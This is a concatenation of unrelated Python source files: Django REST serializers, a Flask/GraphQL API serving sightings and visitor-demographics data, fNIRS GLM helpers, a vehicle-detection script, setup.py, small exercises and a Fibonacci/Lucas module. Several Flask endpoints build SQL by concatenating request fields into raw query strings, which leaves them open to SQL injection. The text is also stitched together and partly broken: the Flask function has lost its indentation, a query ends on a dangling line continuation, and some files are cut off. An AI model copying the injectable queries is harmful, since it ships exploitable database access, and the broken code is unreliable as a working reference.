#from rest_framework.response import Response
from .models import Category, Product
class RecursiveSerializer(serializers.Serializer):
    """Serialize self-referential children with the declaring serializer.

    NOTE: relies on DRF's many=True wrapping -- self.parent is the list
    wrapper and self.parent.parent the declaring serializer; confirm if the
    field is ever used without many=True.
    """

    def to_representation(self, value):
        serializer = self.parent.parent.__class__(value, context=self.context)
        return serializer.data
class CategorySerializers(serializers.ModelSerializer):
    """Category plus recursively nested child categories."""

    # Read-only recursion over the reverse relation.
    childcategories = RecursiveSerializer(many=True, read_only=True)

    class Meta:
        model = Category
        fields = ('id', 'name', 'parent', 'childcategories',)
class ProductSerializer(serializers.ModelSerializer):
    """Flat serializer for Product: id, name, price and its categories relation."""

    class Meta:
        model = Product
        fields = ('id', 'name', 'price', 'categories')
#class CategorySerializers(serializers.ModelSerializer):
# class Meta:
# model = Category
# fields = ('id', 'name', 'parent')
#def get_fields(self):
# fields = super(CategorySerializers, self).get_fields()
# #fields['childcategories'] = CategorySerializers(many=True, allow_null=True)
# return fields
#class CategorySerializers(serializers.ModelSerializer):
# class Meta:
# model = Category
# fields = ('id', 'name', 'parent') |
7,950 | 2f76bcfde11597f87bb9e058f7617e95c78ed383 | # app/__init__.py
import json
from flask_api import FlaskAPI, status
import graphene
from graphene import relay
from graphene_sqlalchemy import SQLAlchemyConnectionField, SQLAlchemyObjectType
from flask_sqlalchemy import SQLAlchemy
from sqlalchemy import func
from flask import request, jsonify, abort, make_response
from flask_graphql import GraphQLView
from shapely.geometry import shape, Point
# local import
from instance.config import app_config
# For password hashing
from flask_bcrypt import Bcrypt
# initialize db
db = SQLAlchemy()
from app.models import Date, Area, LTESighting, SmallCell, Site, SightingsPerHourPerCountry, SightingsNew, SightingsBase, WideSighting, Journey
from app.models import Department as DepartmentModel
from app.ng_event_models import ZoneDistrict, AttractionTotal, Profile, PurchDistrict, DOWFrequency
class Department(SQLAlchemyObjectType):
    """GraphQL type backed by the Department SQLAlchemy model (Relay node)."""

    class Meta:
        model = DepartmentModel
        interfaces = (relay.Node, )
class Query(graphene.ObjectType):
    """Root GraphQL query: a Relay node field plus a Department connection."""

    node = relay.Node.Field()
    # NOTE(review): the field is named "all_employees" but it pages over
    # Department objects -- confirm the intended naming.
    all_employees = SQLAlchemyConnectionField(Department)
def create_app(config_name):
app = FlaskAPI(__name__, instance_relative_config=True)
# overriding Werkzeugs built-in password hashing utilities using Bcrypt.
bcrypt = Bcrypt(app)
schema = graphene.Schema(query=Query)
app.add_url_rule('/graphql', view_func=GraphQLView.as_view('graphql', schema=schema, graphiql=True))
app.config.from_object(app_config[config_name])
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db.init_app(app)
@app.route('/api/areas/create', methods=['POST'])
def create_areas():
# get the access token
name = request.data.get('name', '')
geodata = request.data.get('geodata', '')
center_lat = request.data.get('center_lat')
center_lng = request.data.get('center_lng')
zoom = request.data.get('zoom')
area = Area(name=name, geodata=geodata, center_lat=center_lat, center_lng=center_lng, zoom=zoom)
area.save()
response = jsonify({
'id': area.id,
'name': area.name,
'geodata': area.geodata,
'center_lat' : area.center_lat,
'center_lng' : area.center_lng,
'zoom' : area.zoom,
'date_created': area.date_created,
'date_modified': area.date_modified
})
return make_response(response), 201
@app.route('/api/areas/delete', methods=['POST'])
def delete_areas():
# get the access token
id = request.data.get('id', 0)
area = Area.query.filter_by(id=id).first()
if (area is not None):
area.delete()
return make_response(jsonify({'id':id})), 200
@app.route('/api/sightingsperhour', methods=['GET'])
def get_sightingsperhour():
# get all the areas
sightings = SightingsPerHourPerCountry.query.all()
results = []
for sighting in sightings:
results.append({'country' : sighting.country, 'hour' : sighting.hour, 'count' : sighting.count})
return make_response(jsonify({ 'list' : results })), 200
@app.route('/api/sightingsnew', methods=['POST'])
def sightingsnew():
sightings = db.session.query(SightingsBase.site_id, SightingsBase.country, func.count(SightingsBase.roundedtoday))\
.filter(SightingsBase.site_id.in_(request.data['selectedRow']))\
.filter(SightingsBase.roundedtoday.between(request.data['selectedDates'][0], request.data['selectedDates'][1]))\
.group_by(SightingsBase.site_id, SightingsBase.country)\
.order_by(SightingsBase.site_id, func.count(SightingsBase.roundedtoday).desc())\
results = []
for sighting in sightings.all():
results.append({'country' : sighting.country, 'site_id' : sighting.site_id, 'count' : sighting[2]})
return make_response(jsonify({ 'list' : results })), 200
@app.route('/api/widesightingsnew', methods=['POST', 'GET'])
def widesightingsnew():
sightings = db.session.query(WideSighting.site_id, WideSighting.gender, func.count(WideSighting.gender))\
.filter(WideSighting.site_id.in_([138, 134]))\
.group_by(WideSighting.site_id, WideSighting.gender)
results = []
for sighting in sightings.all():
#gender = sighting.gender if len(sighting.gender) else 'unknown'
results.append({'site_id' : sighting.site_id, 'gender' : sighting.gender, 'count' : sighting[2]})
return make_response(jsonify({ 'list' : results })), 200
@app.route('/api/widesightings', methods=['GET'])
def widesightings():
sightings = WideSighting.get_all()
results = []
for sighting in sightings:
results.append(sighting.serialise())
return make_response(jsonify({ 'list' : results })), 200
@app.route('/api/sites', methods=['GET'])
def get_sites():
# get all the areas
sites = Site.get_all()
results = []
for site in sites:
results.append(site.serialise())
return make_response(jsonify({ 'list' : results })), 200
@app.route('/api/dates', methods=['GET'])
def get_dates():
# get all the areas
dates = Date.get_all()
results = []
for date in dates:
results.append(date.serialise())
return make_response(jsonify({ 'list' : results })), 200
@app.route('/api/areas', methods=['GET'])
def get_areas():
# get all the areas
areas = Area.get_all()
allSmallCells = SmallCell.get_all()
results = []
for area in areas:
smallcellInArea = []
for smallcell in allSmallCells:
smallcellInArea.append(smallcell.serialise())
obj = {
'id': area.id,
'name': area.name,
'date_created': area.date_created,
'date_modified': area.date_modified,
'center_lat' : area.center_lat,
'center_lng' : area.center_lng,
'zoom' : area.zoom,
'geodata': area.geodata,
'smallcells' : smallcellInArea
}
results.append(obj)
return make_response(jsonify({ 'list' : results })), 200
@app.route('/api/smallcells', methods=['GET'])
def get_smallcells():
allSmallCells = SmallCell.query.order_by(SmallCell.id).all()
results = []
for smallcell in allSmallCells:
results.append(smallcell.serialise())
return make_response(jsonify({ 'list' : results })), 200
@app.route('/api/smallcells/update', methods=['POST'])
def update_smallcell():
smallcell_id = request.data.get('id', '')
site_id = request.data.get('site_id', '')
smallcell = SmallCell.query.filter_by(id=smallcell_id).first()
smallcell.site_id = site_id
smallcell.save()
return make_response(jsonify({ 'smallcell_id' : smallcell.id, 'site_id' : smallcell.site_id })), 200
@app.route('/api/sighting/byarea/<areaid>', methods=['GET'])
def get_sighting(areaid):
import string
area = Area.query.filter_by(id=areaid).first()
if area is None : return make_response(jsonify({ 'list' : [] })), 200
sites = []
for site in Site.get_all():
if area.contains(site):
sites.append(str(site.id))
def generate_random_data(num_rows):
import random
latitude = 51.51451110408478
longitude = -0.12620388576521444
result = []
for _ in range(num_rows):
dec_lat = random.random()/10
dec_lon = random.random()/10
result.append({'lat' : latitude + dec_lat, 'lng' : longitude + dec_lon})
return result
results = []
if (len(sites) > 0):
for row in db.session.execute('select * from get_gender_crossfilter(ARRAY[' + ','.join(sites) + '])'):
results.append(({ 'geos': generate_random_data(5), 'gender' : row['__gender'], 'age_range' : row['__age_range'], 'timestamp' : row['__sighting_date'], 'count' : row['__count'] }))
return make_response(jsonify({ 'list' : results })), 200
@app.route('/api/sighting/getgender/', methods=['POST'])
def get_gender():
site_ids = str(request.data.get('site_ids', ''))
from_sighting_date = request.data.get('selectedDates')[0]
to_sighting_date = request.data.get('selectedDates')[1]
import string
results = []
for row in db.session.execute("select * from get_gender(ARRAY[" + site_ids + "]," + "'" + from_sighting_date + "'" + "," + "'" + to_sighting_date + "'" + ")"):
results.append(({ 'site_id' : row['__site_id'], 'date_month' : row['__date_month'], 'gender' : row['__gender'], 'age_range' : row['__age_range'], 'perc_visits' : row['__perc_visits'], 'scaled_visits' : row['__scaled_visits'] }))
return make_response(jsonify({ 'list' : results })), 200
@app.route('/api/sighting/getgendertotals/', methods=['POST'])
def get_gender_age_totals():
site_ids = str(request.data.get('site_ids', ''))
from_sighting_date = request.data.get('selectedDates')[0]
to_sighting_date = request.data.get('selectedDates')[1]
import string
results = []
for row in db.session.execute("select * from get_gender_age_totals(ARRAY[" + site_ids + "]," + "'" + from_sighting_date + "'" + "," + "'" + to_sighting_date + "'" + ")"):
results.append(({ 'site_id' : row['__site_id'], 'gender' : row['__gender'], 'age_range' : row['__age_range'], '__visits' : row['__visits'] }))
return make_response(jsonify({ 'list' : results })), 200
@app.route('/api/sighting', methods=['GET'])
def get_sightings():
results = []
for sighting in LTESighting.get_all():
results.append(sighting.serialise())
return make_response(jsonify({ 'list' : results })), 200
@app.route('/api/sitescomparison', methods=['POST'])
def get_sitescomparison():
sightings = LTESighting.query\
.filter(LTESighting.smallcell.has(SmallCell.site_id.in_(request.data['selectedRow'])))\
.filter(LTESighting.timestamp.between(request.data['selectedDates'][0], request.data['selectedDates'][1]))
return make_response(jsonify({ 'list' : [sighting.serialise() for sighting in sightings] })), 200
@app.route('/api/sighting/bysite', methods=['GET'])
def get_sightings_by_site():
site_ids = (request.args.getlist('site_id'))
results = []
#should do this better with joins!
for sighting in LTESighting.query:
if (str(sighting.smallcell.site_id)) in site_ids : results.append(sighting.serialise())
return make_response(jsonify({ 'list' : results })), 200
@app.route('/api/origindestination/all', methods=['GET'])
def get_all():
journeys = Journey.query.all()
thing = {}
for journey in journeys:
if (journey.origin_id not in thing) :
thing[journey.origin_id] = {}
if (journey.destination_id not in thing[journey.origin_id] and journey.destination_id != journey.origin_id) :
thing[journey.origin_id][journey.destination_id] = journey.data['total']
return make_response(jsonify(thing)), 200
@app.route('/api/origindestination/<origin_id>', methods=['GET'])
def get_od(origin_id):
journeys = Journey.query.all()#.filter_by(origin_id=origin_id).all()
_j = []
for journey in journeys:
_j.append({'origin_id' : journey.origin_id, 'destination_id' : journey.destination_id, 'total' : journey.data['total']})
#_j.append({'origin_id' : journey.origin_id, 'data' : (journey.data)})
return make_response(jsonify({ 'list' : _j })), 200
@app.route('/api/ng_event/purchase/<home_district_name>/<type_visitor>', methods=['GET'])
def purchase(home_district_name, type_visitor):
    """Purchase breakdowns for one home district and visitor type.

    Returns day-of-week, gender, and gender x age counts, each with its
    share of the respective total.
    """
    # Purchases per start day-of-week, most frequent first.
    days_sql = db.session.query(PurchDistrict.start_dow, func.count(PurchDistrict.start_dow))\
        .group_by(PurchDistrict.start_dow)\
        .filter(PurchDistrict.home_district_name.in_([home_district_name]))\
        .filter(PurchDistrict.type_visitor.in_([type_visitor]))\
        .order_by(func.count(PurchDistrict.start_dow).desc())\
        .all()
    # Purchases per gender.
    gender_sql = db.session.query(PurchDistrict.gender, func.count(PurchDistrict.gender))\
        .group_by(PurchDistrict.gender)\
        .filter(PurchDistrict.home_district_name.in_([home_district_name]))\
        .filter(PurchDistrict.type_visitor.in_([type_visitor])).all()
    # Purchases per (gender, age), excluding rows with missing values.
    gender_age_sql = db.session.query(PurchDistrict.gender, PurchDistrict.age, func.count(PurchDistrict.gender))\
        .group_by(PurchDistrict.gender, PurchDistrict.age)\
        .filter(PurchDistrict.gender.isnot(None))\
        .filter(PurchDistrict.age.isnot(None))\
        .filter(PurchDistrict.home_district_name.in_([home_district_name]))\
        .filter(PurchDistrict.type_visitor.in_([type_visitor])).all()
    # The original also executed a (gender, age, rent) query here whose result
    # was never used (and which did not filter on home_district_name); that
    # dead database roundtrip has been removed.
    days_total = sum(row[1] for row in days_sql)
    gender_total = sum(row[1] for row in gender_sql)
    gender_age_total = sum(row[2] for row in gender_age_sql)
    days_results = [
        {'start_dow': row.start_dow, 'count': row[1],
         'percent': float(row[1]) / float(days_total), 'total': days_total}
        for row in days_sql
    ]
    gender_results = [
        {'gender': row.gender, 'count': row[1],
         'percent': float(row[1]) / float(gender_total)}
        for row in gender_sql
    ]
    gender_age_results = [
        {'gender': row.gender, 'age': row.age, 'count': row[2],
         'percent': float(row[2]) / float(gender_age_total)}
        for row in gender_age_sql
    ]
    return make_response(jsonify({'days': days_results, 'gender': gender_results, 'gender_age': gender_age_results})), 200
@app.route('/api/ng_event/purchase_affluence/<type_visitor>', methods=['GET'])
def purchase_rent(type_visitor):
    """Gender share plus (gender, age, rent) purchase counts for one visitor type."""
    gender_rows = db.session.query(
        PurchDistrict.gender, func.count(PurchDistrict.gender)) \
        .group_by(PurchDistrict.gender) \
        .filter(PurchDistrict.type_visitor.in_([type_visitor])).all()
    # Rows with a missing gender or age are excluded from the detailed table.
    gender_age_rent_rows = db.session.query(
        PurchDistrict.gender, PurchDistrict.age, PurchDistrict.rent,
        func.count(PurchDistrict.gender)) \
        .group_by(PurchDistrict.gender, PurchDistrict.age, PurchDistrict.rent) \
        .filter(PurchDistrict.gender.isnot(None)) \
        .filter(PurchDistrict.age.isnot(None)) \
        .filter(PurchDistrict.type_visitor.in_([type_visitor])).all()
    total = sum(row[1] for row in gender_rows)
    gender_results = [
        {'gender': row.gender, 'count': row[1], 'percent': float(row[1]) / float(total)}
        for row in gender_rows
    ]
    gender_age_rent_results = [
        {'gender': row.gender, 'age': row.age, 'rent': row.rent, 'count': row[3]}
        for row in gender_age_rent_rows
    ]
    return make_response(jsonify({'gender': gender_results, 'gender_age_rent': gender_age_rent_results})), 200
@app.route('/api/ng_event/districts', methods=['GET'])
def districts():
    """Visitor sums grouped by home district and, separately, by work district."""
    home_rows = db.session.query(
        ZoneDistrict.home_district_code,
        ZoneDistrict.home_district_name,
        func.sum(ZoneDistrict.visitors),
    ).group_by(ZoneDistrict.home_district_code, ZoneDistrict.home_district_name).all()
    home_results = [
        {'district_code': code, 'district_name': name, 'visitors': visitors}
        for code, name, visitors in home_rows
    ]
    work_rows = db.session.query(
        ZoneDistrict.work_district_code,
        ZoneDistrict.work_district_name,
        func.sum(ZoneDistrict.visitors),
    ).group_by(ZoneDistrict.work_district_code, ZoneDistrict.work_district_name).all()
    work_results = [
        {'district_code': code, 'district_name': name, 'visitors': visitors}
        for code, name, visitors in work_rows
    ]
    return make_response(jsonify({'work': {'list': work_results}, 'home': {'list': home_results}})), 200
@app.route('/api/ng_event/attractiontotals', methods=['GET'])
def attractiontotals():
    """Zone-visitor / visitor-count pairs for every attraction-total row."""
    rows = db.session.query(AttractionTotal.zone_visitors, AttractionTotal.num_visitors).all()
    results = [
        {'zone_visitors': zone_visitors, 'num_visitors': num_visitors}
        for zone_visitors, num_visitors in rows
    ]
    return make_response(jsonify({'totals': {'list': results}})), 200
@app.route('/api/ng_event/profiles', methods=['GET'])
def profiles():
    """Up to 10000 visitor profiles, with the tourist zone mapped to a
    district name and the weekday abbreviated to three letters.

    Values outside the known zones/days map to '' (matching the original
    if-chains, which this lookup-table version replaces).
    """
    zone_to_district = {'Zone 1': 'Chamartin', 'Zone 2': 'Chamberi', 'Zone 3': 'Salamanca'}
    day_abbrev = {'Monday': 'Mon', 'Tuesday': 'Tue', 'Wednesday': 'Wed',
                  'Thursday': 'Thu', 'Friday': 'Fri', 'Saturday': 'Sat',
                  'Sunday': 'Sun'}
    results = []
    for result in db.session.query(Profile.country, Profile.nationality, Profile.name_province, Profile.gender, Profile.age, Profile.rent, Profile.type_visitor, Profile.date, Profile.day, Profile.period, Profile.name_tur_zone).limit(10000):
        results.append({
            'country': result.country,
            'nationality': result.nationality,
            'name_province': zone_to_district.get(result.name_tur_zone, ''),
            'gender': result.gender,
            'age': result.age,
            'rent': result.rent,
            'type_visitor': result.type_visitor,
            'date': result.date,
            'day': day_abbrev.get(result.day, ''),
            'period': result.period,
            'zone': result.name_tur_zone,
        })
    return make_response(jsonify(results)), 200
@app.route('/api/ng_event/dowfreq', methods=['GET'])
def dowfreq():
    """Day-of-week / start-hour frequency rows for each visitor type."""
    rows = db.session.query(DOWFrequency.type_visitor, DOWFrequency.start_dow,
                            DOWFrequency.start_hour, DOWFrequency.count).all()
    payload = [
        {'type_visitor': row.type_visitor, 'start_dow': row.start_dow,
         'start_hour': row.start_hour, 'count': row.count}
        for row in rows
    ]
    return make_response(jsonify(payload)), 200
return app
|
7,951 | 8279c6d5f33d5580bef20e497e2948461a1de62c | # Authors: Robert Luke <mail@robertluke.net>
#
# License: BSD (3-clause)
import numpy as np
from mne.io.pick import _picks_to_idx
def run_GLM(raw, design_matrix, noise_model='ar1', bins=100,
            n_jobs=1, verbose=0):
    """Fit a GLM to each fNIRS channel of ``raw``.

    Thin wrapper around ``nilearn.glm.first_level.run_glm``.

    Parameters
    ----------
    raw : instance of Raw
        The haemoglobin data.
    design_matrix : DataFrame
        The design matrix, as specified in Nilearn.
    noise_model : {'ar1', 'ols'}, optional
        The temporal variance model. Defaults to 'ar1'.
    bins : int, optional
        Maximum number of discrete bins for the AR(1) coef histogram.
    n_jobs : int, optional
        Number of CPUs used for the computation; -1 means all CPUs.
    verbose : int, optional
        Verbosity level. Default is 0.

    Returns
    -------
    glm_estimates : dict
        Mapping from channel name to the RegressionResults instance for
        that channel.
    """
    from nilearn.glm.first_level import run_glm

    fnirs_picks = _picks_to_idx(raw.info, 'fnirs', exclude=[], allow_empty=True)
    estimates = {}
    for idx in fnirs_picks:
        labels, glm_estimates = run_glm(
            raw.get_data(idx).T,
            design_matrix.values,
            noise_model=noise_model,
            bins=bins,
            n_jobs=n_jobs,
            verbose=verbose,
        )
        # Each call sees a single channel, so there is exactly one label.
        estimates[raw.ch_names[idx]] = glm_estimates[labels[0]]
    return estimates
def compute_contrast(glm_est, contrast, contrast_type=None):
    """Compute a contrast over regression results.

    Thin wrapper around ``nilearn.glm.contrasts.compute_contrast``.

    Parameters
    ----------
    glm_est : dict
        Nilearn regression results keyed by channel, as returned by
        ``run_GLM``.
    contrast : numpy.ndarray of shape (p,) or (q, p)
        q contrast vectors over p regressors.
    contrast_type : {None, 't', 'F'}, optional
        Type of the contrast. If None, 't' is used for a 1D contrast and
        'F' for a 2D one.

    Returns
    -------
    contrast : Contrast instance
        Holds the statistics of the contrast (effects, variance, p-values).
    """
    from nilearn.glm.contrasts import compute_contrast as _compute_contrast

    labels = np.array(list(glm_est.keys()))
    return _compute_contrast(labels, glm_est, contrast,
                             contrast_type=contrast_type)
|
# Three homes at 25 each plus two tunnels at 40 each.
threehome = 3 * 25
twotonnel = 2 * 40
alldude = sum((threehome, twotonnel))
print('%s Заварушку устроили' % alldude)
|
7,953 | 2bc0d76e17f2f52fce9cc1925a3a0e0f53f5b81d | from fractions import Fraction
import itertools
# With MOD
MOD = 10**9+7

def ncomb(n, r):
    """Return C(n, r) via a product of Fractions, reducing modulo MOD.

    Fixes the original's missing ``reduce`` import — ``reduce`` is not a
    builtin on Python 3, so the original raised NameError when called.

    NOTE(review): ``%`` is applied to Fraction intermediates, which only has
    an effect once the running product is an integer >= MOD; for true modular
    binomials an integer-only scheme would be more appropriate.  Behaviour
    preserved as-is.
    """
    from functools import reduce
    return reduce(lambda a, b: (a * b) % MOD, (Fraction(n - i, i + 1) for i in range(r)), 1)
# No MOD
def ncomb(n, r):
    """Return C(n, r) exactly as a product of Fractions.

    NOTE: this redefinition replaces the MOD variant above, since both share
    the name ``ncomb``.  Fixes the missing ``reduce`` import (NameError on
    Python 3).
    """
    from functools import reduce
    return reduce(lambda a, b: a * b, (Fraction(n - i, i + 1) for i in range(r)), 1)
def comb(a, l):
    """Return all length-``l`` combinations of ``a`` as a list of tuples."""
    # list() replaces the original's redundant identity comprehension.
    return list(itertools.combinations(a, l))
def comball(a):
    """Return every combination of ``a`` of every length (the power set),
    ordered shortest-first."""
    return [combo
            for size in range(len(a) + 1)
            for combo in itertools.combinations(a, size)]
|
# Weekday labels (Romanian abbreviations, Monday-Sunday).
zi = ["L", "Ma", "Mi", "J", "Vi", "S", "D"]
# Read one integer salary per day from the user.
V = []
for day in zi:
    x = input("dati salariul de: {} ".format(day))
    V.append(int(x))
print("Salariul in fiecare zi: {}".format(V))
# Weekly total, daily average (2 decimals), and the highest daily salary.
print(sum(V))
print(round(sum(V)/7, 2))
print(max(V))
# Compute each extreme once instead of re-evaluating max()/min() per iteration.
best = max(V)
vMax = [zi[i] for i in range(len(zi)) if V[i] == best]
print(vMax)
worst = min(V)
vMin = [zi[i] for i in range(len(zi)) if V[i] == worst]
print(vMin)
|
7,955 | 89db4431a252d024381713eb7ad86346814fcbe4 | from sklearn.svm import SVC
from helper_functions import *
from sklearn.metrics import accuracy_score
from sklearn.model_selection import train_test_split
from sklearn.utils import shuffle
from sklearn.preprocessing import StandardScaler
import matplotlib.image as mpimg
import matplotlib.pyplot as plt
import glob
import pickle
from scipy.ndimage.measurements import label
from keras.models import load_model
# Pre-trained SVM classifier, its feature scaler, and a CNN verifier,
# loaded from files on disk.
# NOTE(review): the pickle files are opened without being closed — harmless
# for a one-shot script, but the handles leak.
svc_model = pickle.load(open("svm_model.p", "rb"))
svc_scaler = pickle.load(open("svm_scaler.p", "rb"))
cnn_model = load_model("model.h5")
# Parameters
color_space = 'RGB' # Can be RGB, HSV, LUV, HLS, YUV, YCrCb
orient = 9 # HOG orientations
pix_per_cell = 8 # HOG pixels per cell
cell_per_block = 2 # HOG cells per block
hog_channel = "gray" # Can be 0, 1, 2, or "ALL"
spatial_size = (32, 32) # Spatial binning dimensions
hist_bins = 32 # Number of histogram bins
spatial_feat = True # Spatial features on or off
hist_feat = True # Histogram features on or off
hog_feat = True # HOG features on or off
# Per-scale vertical search ranges and window overlaps for the sliding
# window search in process_image (None = to the bottom of the frame).
y_start_stop_32 = [400, 450] # Min and max in y to search in slide_window()
y_start_stop_64 = [400, 600]
y_start_stop_80 = [400, None]
y_start_stop_128 = [400, None]
xy_overlap_32 = [0.75,0.75]
xy_overlap_64 = [0.75,0.75]
xy_overlap_80 = [0.5,0.5]
xy_overlap_128 = [0.5, 0.5]
# placeholder to save frames from video
heatmap_glob = None
def _search_windows(image, windows):
    """Classify each candidate window with the SVM; return the positive ones."""
    hits = []
    for window in windows:
        patch = cv2.resize(
            image[window[0][1]:window[1][1], window[0][0]:window[1][0]], (64, 64))
        features = single_extract_features(
            patch, color_space=color_space,
            spatial_size=spatial_size, hist_bins=hist_bins,
            orient=orient, pix_per_cell=pix_per_cell,
            cell_per_block=cell_per_block,
            hog_channel=hog_channel, spatial_feat=spatial_feat,
            hist_feat=hist_feat, hog_feat=hog_feat)
        # Scale the feature vector exactly as it was scaled during training.
        scaled = svc_scaler.transform(features.reshape(1, -1))
        if svc_model.predict(scaled) == 1:
            hits.append(window)
    return hits


def process_image(image):
    """Detect vehicles in one video frame and return it with boxes drawn.

    Runs a multi-scale sliding-window SVM search, accumulates detections
    into a temporally-smoothed heatmap, labels connected heat regions, and
    draws their bounding boxes on a copy of the frame.
    """
    draw_image = np.copy(image)

    # One (window size, y search range, overlap) entry per search scale.
    # NOTE(review): the 80x80 scale searched y_start_stop_64 in the original
    # even though y_start_stop_80 exists unused; preserved -- confirm intent.
    scales = [
        ((32, 32), y_start_stop_32, xy_overlap_32),
        ((64, 64), y_start_stop_64, xy_overlap_64),
        ((80, 80), y_start_stop_64, xy_overlap_80),
        ((128, 128), y_start_stop_128, xy_overlap_128),
    ]
    window_detected_list = []
    for xy_window, y_limits, overlap in scales:
        windows = slide_window(image, y_start_stop=y_limits,
                               xy_window=xy_window, xy_overlap=overlap)
        window_detected_list.extend(_search_windows(image, windows))

    # Accumulate detections into a heatmap and threshold out false positives.
    # (plain float replaces np.float, which is removed in modern numpy)
    heat = np.zeros_like(image[:, :, 0]).astype(float)
    heat = add_heat(heat, window_detected_list)
    heat = apply_threshold(heat, 4)
    heatmap = np.clip(heat, 0, 255)

    # Exponential smoothing of the heatmap across frames.  BUG FIX: the
    # original compared the array to None with `==`, which raises
    # "truth value of an array is ambiguous" once heatmap_glob holds an
    # array; `is None` is the correct first-frame check.
    global heatmap_glob
    if heatmap_glob is None:
        heatmap_glob = heatmap
    new_frame_factor = 0.3
    heatmap = new_frame_factor * heatmap + (1 - new_frame_factor) * heatmap_glob
    heatmap = apply_threshold(heatmap, 4)
    heatmap_glob = heatmap

    # Label connected heat regions; each label is a candidate vehicle.
    labels = label(heatmap)

    # Secondary CNN check of each candidate box.  NOTE(review): the image
    # drawn from the CNN-validated boxes is overwritten below, so today this
    # step only produces the printed predictions -- confirm whether the
    # CNN-filtered drawing was meant to be the returned frame.
    bboxes = get_bboxes_heatmap(labels)
    valid_bboxes = []
    for bbox in bboxes:
        candidate = cv2.resize(
            image[bbox[0][1]:bbox[1][1], bbox[0][0]:bbox[1][0]], (64, 64))
        prediction = cnn_model.predict(candidate[None, :, :, :])
        print(prediction)
        if prediction > 0.5:
            valid_bboxes.append(bbox)
    draw_img = draw_bboxes(np.copy(image), valid_bboxes)

    # Kept for parity with the original: raw-detection overlay (unused).
    img_drawn = draw_boxes(draw_image, window_detected_list)

    draw_img = draw_labeled_bboxes(np.copy(image), labels)
    return draw_img
|
7,956 | 53b6d30bf52c43daaebe8158002db1072e34f127 | from setuptools import setup, find_packages
# Package metadata for the SPT computational framework.
setup(
    name='spt_compute',
    version='2.0.1',
    # Typos fixed: 'Prediciton' -> 'Prediction', 'otherLand' -> 'other Land'.
    description='Computational framework for the Streamflow Prediction Tool',
    long_description='Computational framework to ingest ECMWF ensemble runoff forcasts '
                     ' or other Land Surface Model forecasts;'
                     ' generate input for and run the RAPID (rapid-hub.org) program'
                     ' using HTCondor or Python\'s Multiprocessing; and upload to '
                     ' CKAN in order to be used by the Streamflow Prediction Tool (SPT).'
                     ' There is also an experimental option to use the AutoRoute program'
                     ' for flood inundation mapping.',
    keywords='ECMWF, WRF, RAPID, Flood Prediction, Streamflow Prediction Tool',
    author='Alan Dee Snow',
    author_email='alan.d.snow@usace.army.mil',
    url='https://github.com/erdc/spt_compute',
    license='BSD 3-Clause',
    packages=find_packages(),
    # Runtime dependencies.
    install_requires=[
        'numpy',
        'netCDF4',
        'pandas',
        'RAPIDpy',
        'tethys_dataset_services',
        'xarray',
    ],
    classifiers=[
        'Intended Audience :: Developers',
        'Intended Audience :: Science/Research',
        'Operating System :: OS Independent',
        'Programming Language :: Python',
        'Programming Language :: Python :: 2',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3',
    ],
    # Extra dependencies used only by the test suite (pip install .[tests]).
    extras_require={
        'tests': [
            'coveralls',
            'pytest',
            'pytest-cov',
        ],
    },
)
|
def fibonacci(n):
    """Return the nth Fibonacci number, with position 0 holding 0.

    ``n`` must be an integer greater than or equal to 0.
    """
    seeds = [0, 1]
    # The first two positions are the seeds themselves.
    if n <= 1:
        return seeds[n]
    prev, curr = seeds
    # Advance the pair n-1 times; `curr` then holds the nth element.
    for _ in range(n - 1):
        prev, curr = curr, prev + curr
    return curr
def lucas(n):
    """Return the nth Lucas number, with position 0 holding 2.

    ``n`` must be an integer greater than or equal to 0.
    """
    seeds = [2, 1]
    # The first two positions are the seeds themselves.
    if n <= 1:
        return seeds[n]
    prev, curr = seeds
    # Advance the pair n-1 times; `curr` then holds the nth element.
    for _ in range(n - 1):
        prev, curr = curr, prev + curr
    return curr
def sum_series(n, x=0, y=1):
    """Return the nth element (0-indexed) of one of three fixed sequences.

    The optional (x, y) pair selects the sequence:
      (0, 1) -> Fibonacci (the default)
      (2, 1) -> Lucas
      (3, 2) -> "Foo" (seeds 3, 2)
    Any other combination falls back to Fibonacci, matching the original
    behaviour.  (The original docstring advertised (n, 3, 1) for Foo, but
    the code has always required (3, 2); the docstring is corrected here.)

    The original computed all three sequences on every call; this version
    computes only the one requested.
    """
    def _nth(first, second, k):
        # kth element of the additive sequence seeded with (first, second).
        pair = [first, second]
        if k <= 1:
            return pair[k]
        for _ in range(k - 1):
            pair = [pair[1], pair[0] + pair[1]]
        return pair[1]

    if x == 2 and y == 1:
        return _nth(2, 1, n)
    if x == 3 and y == 2:
        return _nth(3, 2, n)
    return _nth(0, 1, n)
7,958 | c65e14de297cc785b804e68f29bd5766ca7a8cf7 | # _*_ coding:utf-8 _*_
import csv  # imported but unused: the csv.reader path below is commented out
# NOTE(review): Python 2 script ('print' statement below); will not run on Python 3.
c=open(r"e:/test.csv","r+")
#read=csv.reader(c)
#for line in read:
# print line
# Read the whole file as a list of raw lines and dump it.
read=c.readlines()
print read
c.close() |
7,959 | c62647b0b226d97926d1f53975a7aac7c39949d8 | '''This class contains a custom made format for printing complex numbers'''
class ComplexCustom(complex):
    """Complex subclass whose ``format()`` output reads ``(real<+/->imagj)``.

    The supplied format spec is applied to both the real and the imaginary
    part; the imaginary part always carries an explicit sign.
    """

    def __format__(self, fmt):
        """Render the number as ``(real imag j)`` using *fmt* for both parts."""
        return f"({self.real:{fmt}}{self.imag:+{fmt}}j)"
|
7,960 | 710bb0e0efc2c4a3ba9b1ae85e1c22e81f8ca68e | from timemachines.skatertools.testing.allregressiontests import REGRESSION_TESTS
import time
import random
TIMEOUT = 60*5  # total run budget in seconds (5 minutes)
# Regression tests run occasionally to check various parts of hyper-param spaces, etc.
if __name__=='__main__':
    start_time = time.time()
    elapsed = time.time()-start_time
    # Keep running randomly chosen regression tests until the budget is spent.
    # A test that starts just before the deadline is allowed to finish.
    while elapsed < TIMEOUT:
        a_test = random.choice(REGRESSION_TESTS)
        print('Running '+str(a_test.__name__))
        a_test()
        elapsed = time.time() - start_time
|
7,961 | d0287b057530883a50ad9c1e5e74dce10cd825b6 | """ Python Package Support """
# Not applicable
""" Django Package Support """
# Not applicable
""" Internal Package Support """
from Data_Base.models import School, Person, Child
"""
Data_Base/Data/Imports/child_import.py
Author: Matthew J Swann;
Yong Kin;
Bradon Atkins; and
Adam Carter
Version: 1.0
Last Update: 2013-04-07
Update By: Matthew J Swann
Importing data to the person table.
"""
class ChildImport(object):
    """Seed the Child table with fixture rows, linking each child to a school
    and two family members.

